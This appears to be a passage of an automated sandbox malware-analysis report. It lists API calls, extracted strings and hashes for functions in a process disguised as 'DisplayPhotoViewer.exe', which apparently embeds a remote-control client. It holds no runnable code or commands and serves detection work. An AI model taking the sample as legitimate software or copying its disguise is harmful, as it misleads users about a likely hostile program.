                                                                                                    • String ID: %s%s.bin$910646$clientinv.cpp$m_pDoInv == NULL
                                                                                                    • API String ID: 4180936305-2782831137
                                                                                                    • Opcode ID: 571bb0c5ade0659a9f105093dc4fc95c204d326ca185540cfd0bc09d303e3201
                                                                                                    • Instruction ID: 4812e2c773c366c78948061ec2f2f81211db31fda714fb300b1676a6b92b4064
                                                                                                    • Opcode Fuzzy Hash: 571bb0c5ade0659a9f105093dc4fc95c204d326ca185540cfd0bc09d303e3201
                                                                                                    • Instruction Fuzzy Hash: FB21B3B5E04705AFEB10CF65DC40BABB7E8EB44B58F10493EE86597381EB34A900CB61
                                                                                                    Function 1113A9E0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(1113B028,00000000,?,1113B028,00000000), ref: 1113A9FC
                                                                                                    • __strdup.LIBCMT ref: 1113AA17
                                                                                                      • Part of subcall function 1107D210: _strrchr.LIBCMT ref: 1107D21E
                                                                                                      • Part of subcall function 1113A9E0: _free.LIBCMT ref: 1113AA3E
                                                                                                    • _free.LIBCMT ref: 1113AA4C
                                                                                                      • Part of subcall function 11158445: HeapFree.KERNEL32(00000000,00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115845B
                                                                                                      • Part of subcall function 11158445: GetLastError.KERNEL32(00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115846D
                                                                                                    • CreateDirectoryA.KERNEL32(1113B028,00000000,?,?,?,1113B028,00000000), ref: 1113AA57
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 398584587-0
                                                                                                    • Opcode ID: d4be81e038093f7cc673d49315beed639c0140b528f9647da0f76ceb9819d3df
                                                                                                    • Instruction ID: 5773ec2b2ea8cdcddb7b94a0cf006afd2c00aa41893a1b7e486ab9af1975557a
                                                                                                    • Opcode Fuzzy Hash: d4be81e038093f7cc673d49315beed639c0140b528f9647da0f76ceb9819d3df
                                                                                                    • Instruction Fuzzy Hash: 4D01F53BB101161AF741157D7E01BBFBB9D8BC267AF054135FC1CD6299F652E10742A2
                                                                                                    Function 1113BB60 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113AEB0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
                                                                                                    • wsprintfA.USER32 ref: 1113BB8E
                                                                                                    • wsprintfA.USER32 ref: 1113BBA4
                                                                                                      • Part of subcall function 111395A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110784B,75BF8400,?), ref: 11139637
                                                                                                      • Part of subcall function 111395A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11139657
                                                                                                      • Part of subcall function 111395A0: CloseHandle.KERNEL32(00000000), ref: 1113965F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                    • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                    • API String ID: 3779116287-2600120591
                                                                                                    • Opcode ID: bf8ad4c271e022cbfc4851942c974fc1eb87712d7338be7a8daae4851b5ebf30
                                                                                                    • Instruction ID: 19a82a5669adbd5d84511c9ac25418f2ec4c89046835a3c9e5a4f0115d71f71b
                                                                                                    • Opcode Fuzzy Hash: bf8ad4c271e022cbfc4851942c974fc1eb87712d7338be7a8daae4851b5ebf30
                                                                                                    • Instruction Fuzzy Hash: 7301F17AD1921D62DA10DBB0AC02BEEF76C8B85329F400196EC0996188FD30BA448AA5
                                                                                                    Function 111395A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110784B,75BF8400,?), ref: 11139637
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11139657
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1113965F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile$CloseHandle
                                                                                                    • String ID: "
                                                                                                    • API String ID: 1443461169-123907689
                                                                                                    • Opcode ID: 56ddfe995fad7f7ad01f7aed1757c08503b235ea1f055dc7748f4fe5493489f1
                                                                                                    • Instruction ID: 1c2477c3206a523109fe385bc688dc8158c49b02070ad5bfc4a67a45e2074a3c
                                                                                                    • Opcode Fuzzy Hash: 56ddfe995fad7f7ad01f7aed1757c08503b235ea1f055dc7748f4fe5493489f1
                                                                                                    • Instruction Fuzzy Hash: AC21DD3161424DAFE712CE38DD50BD9BBA59B82324F2046E5E8C6CB1C9FE709A89C750
                                                                                                    Function 1102BA20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SetEvent.KERNEL32(00000C34,Client,DisableGeolocation,00000000,00000000,218EC38C,74DF2EE0,?,00000000,Function_0017A29B,000000FF,?,1102E7CB,Client,UseIPC,00000001), ref: 1102BAD7
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                      • Part of subcall function 111078A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110859D,00000000,00000001,?,?,?,?,?,1102F5F3), ref: 111078BE
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102BA9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                    • String ID: Client$DisableGeolocation
                                                                                                    • API String ID: 3315423714-4166767992
                                                                                                    • Opcode ID: e69fa41f11fcc5e579b4203668c7d4f63ce6f07d1d15be820b00a95ecdd96e07
                                                                                                    • Instruction ID: 504a91ac801fad8ffe14612fa14b8858fde6a0909de131ffa1e724ebb17bf2a2
                                                                                                    • Opcode Fuzzy Hash: e69fa41f11fcc5e579b4203668c7d4f63ce6f07d1d15be820b00a95ecdd96e07
                                                                                                    • Instruction Fuzzy Hash: CF217274B41761AFE711CFA4CC46B69B7A4E708B18F10426EE9615B3C0EBB56401CB94
                                                                                                    Function 11025F00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025F2A
                                                                                                      • Part of subcall function 110C7250: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,11059DFB,?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C726B
                                                                                                      • Part of subcall function 110C7250: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C7298
                                                                                                      • Part of subcall function 110C7250: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C72AA
                                                                                                      • Part of subcall function 110C7250: LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72B4
                                                                                                    • TranslateMessage.USER32(?), ref: 11025F40
                                                                                                    • DispatchMessageA.USER32(?), ref: 11025F46
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                    • String ID: Exit Msgloop, quit=%d
                                                                                                    • API String ID: 3212272093-2210386016
                                                                                                    • Opcode ID: cf26e9018ae4132122310db48b5282dc0ab3af1b892683448944b02675533e27
                                                                                                    • Instruction ID: d89c40251b6bfc8e70c3015f3d7383fd8c3cfab5e37f5722f073c655be436893
                                                                                                    • Opcode Fuzzy Hash: cf26e9018ae4132122310db48b5282dc0ab3af1b892683448944b02675533e27
                                                                                                    • Instruction Fuzzy Hash: A0F0C8B7E0121557C640DBD5ACC1FAFF37C9BC8608F804465EE15D3148E621B4058BA1
                                                                                                    Function 07E21020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCommandLineA.KERNEL32 ref: 07E21027
                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 07E2107B
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 07E21096
                                                                                                    • ExitProcess.KERNEL32 ref: 07E210A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 07E20000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_7e20000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                    • String ID:
                                                                                                    • API String ID: 2164999147-0
                                                                                                    • Opcode ID: 0d8b40b86484847c175808b603f48bfba749d448f721e36594049b1950150f4f
                                                                                                    • Instruction ID: cef9564cfcd73b1be71ea83e532a5f06d267a67c67c21e0051595bee3c2880a1
                                                                                                    • Opcode Fuzzy Hash: 0d8b40b86484847c175808b603f48bfba749d448f721e36594049b1950150f4f
                                                                                                    • Instruction Fuzzy Hash: 431108F04063EE6AEB314E608449FEABF9A7F0238CF342044DDD596146C67646C7E365
                                                                                                    Function 11139F90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(11027F7F,?,1113A1E3,?), ref: 11139F9C
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe,00000104,?,1113A1E3,?), ref: 11139FB9
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe, xrefs: 11139FA4, 11139FB2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                    • String ID: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                    • API String ID: 2251294070-2359701382
                                                                                                    • Opcode ID: 3dbb660838f1bcf71a8df8c4176f8b31fd4322268f9bd3aff93e5a726e143a41
                                                                                                    • Instruction ID: 079cde17b882fc661c5cd1b0716c19d555b4d8b9dd1b7d0460bd42ff414687a1
                                                                                                    • Opcode Fuzzy Hash: 3dbb660838f1bcf71a8df8c4176f8b31fd4322268f9bd3aff93e5a726e143a41
                                                                                                    • Instruction Fuzzy Hash: C6112331B512169BE709DFE5D984B29FBD9ABC472AF00803CE849C76C8EB71E840C745
                                                                                                    Function 11107820 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 11107829
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • _memset.LIBCMT ref: 11107852
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                    • String ID: ..\ctl32\Refcount.cpp
                                                                                                    • API String ID: 2803934178-2363596943
                                                                                                    • Opcode ID: 8f0fd21ade5106aebc5e12d8de822042e3c768cee8e55ef0a11524b63809a721
                                                                                                    • Instruction ID: 06c353a90772c29cefbbce5cdda557822b50b394f937f9b4c7d55122edf5e5ac
                                                                                                    • Opcode Fuzzy Hash: 8f0fd21ade5106aebc5e12d8de822042e3c768cee8e55ef0a11524b63809a721
                                                                                                    • Instruction Fuzzy Hash: 78E0C22BF8092533C1A120977D02FDFFA4C4BA29ADF040031FD0C66212E581B60581E2
                                                                                                    Function 111097A0 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 111097CA
                                                                                                    • __wsplitpath.LIBCMT ref: 111097E5
                                                                                                      • Part of subcall function 1115E804: __splitpath_helper.LIBCMT ref: 1115E846
                                                                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11109819
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                    • String ID:
                                                                                                    • API String ID: 1847508633-0
                                                                                                    • Opcode ID: 17b11c500efaa864637ee90d6cd031dca358ae21ff22c51b22de302bb99d8ba8
                                                                                                    • Instruction ID: cfcff6d08eced77461863aef3a19504d4271605eb2284c94472767243ec66a9a
                                                                                                    • Opcode Fuzzy Hash: 17b11c500efaa864637ee90d6cd031dca358ae21ff22c51b22de302bb99d8ba8
                                                                                                    • Instruction Fuzzy Hash: 5411C435A4020CBBEB14DF94CC42FECF374AF48B04F404098EA246B1C0E7B02A05CB66
                                                                                                    Function 110996C0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F0A64,00000030,11137B17,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 110996E1
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,110F0A64,00000030,11137B17,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 110996E8
                                                                                                      • Part of subcall function 110995F0: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,0BA671C0,00000000), ref: 11099628
                                                                                                      • Part of subcall function 110995F0: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11099644
                                                                                                      • Part of subcall function 110995F0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0796E970,0796E970,0796E970,0796E970,0796E970,0796E970,0796E970,111E2704,?,00000001,00000001), ref: 11099670
                                                                                                      • Part of subcall function 110995F0: EqualSid.ADVAPI32(?,0796E970,?,00000001,00000001), ref: 11099683
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11099707
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2256153495-0
                                                                                                    • Opcode ID: 60ba714ad3c18b440e077ee4a45bd34648daad3f6dd38bd845bb94ef82c7e924
                                                                                                    • Instruction ID: b3e42719bc7fdada53d275fe7c01c16cb20ff5fc8cb9c64d45f4be543a0a6106
                                                                                                    • Opcode Fuzzy Hash: 60ba714ad3c18b440e077ee4a45bd34648daad3f6dd38bd845bb94ef82c7e924
